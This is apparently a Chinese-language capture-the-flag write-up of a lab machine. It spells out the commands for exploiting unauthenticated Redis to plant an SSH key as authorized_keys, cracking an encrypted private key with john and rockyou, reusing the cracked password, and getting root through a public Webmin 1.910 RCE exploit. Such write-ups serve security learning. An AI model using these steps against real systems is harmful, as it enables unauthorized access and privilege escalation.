nmap scan

#### port explore
22端口不支持无用户名密码登录
80端口是一个静态页面
10000端口是一个登录页面
6379是redis,可能是入手点
#### 目录爆破
两个端口
80和10000
80端口扫出来一个upload界面,但是不知道如何上传
#### web root
尝试利用redis未授权漏洞
先使用telnet验证是否有密码验证
telnet 10.10.10.160 6379

我们可以创建一个ssh密钥连接,将公钥写入redis,用私钥连接

创建好了之后我们下一步就是准备将 它存储到内存之中。由于内存转储中也将包含垃圾,因此我们在密钥周围使用换行符,并且保存在foo.txt中,以便我们更好的守护我们的SSH密钥。
`(echo -e "\n\n"; cat keys.pub; echo -e "\n\n") > foo.txt`
使用redis-cli登录到redis查询他的目录
`config get dir`

将公钥写入redis目录
`cat foo.txt | redis-cli -h 10.10.10.160 -x set ssh_key`

已经成功写入公钥,下一步是配置公钥
获取Redis命令行-将密钥插入到内存之中

设置redis的dir目录
CONFIG SET dir /var/lib/redis/.ssh
设置dbfilename为authorized_keys
config set dbfilename authorized_keys
退出该界面,用ssh登录
ssh -i keys redis@10.10.10.160
成功用redis连接

用history命令可以发现他查看过scan.py和id_rsa.bak

id_rsa.bak是一个加密过的
用ssh2john破解该私钥
`ssh2john id_rsa.bak > hash.txt`
`john -w=/usr/share/wordlists/rockyou.txt hash.txt`

破解出的密码为computer2008
尝试用这个帐号密码进行ssh登录
登录失败,用redis身份登录,查看/etc/ssh/sshd_config
发现Matt在deny user中

直接尝试su Matt,成功切换到Matt用户
root
先使用sudo -l查看是否存在matt可以直接运行的文件,发现没有
尝试用Matt-computer2008登录webmin,因为webmin用系统的登录凭证做用户名密码很常见

登录上去以后发现webmin的版本是1.91
用searchsploit搜索发现webmin1.910存在RCE,去github上搜索利用脚本
尝试使用,成功获得root身份
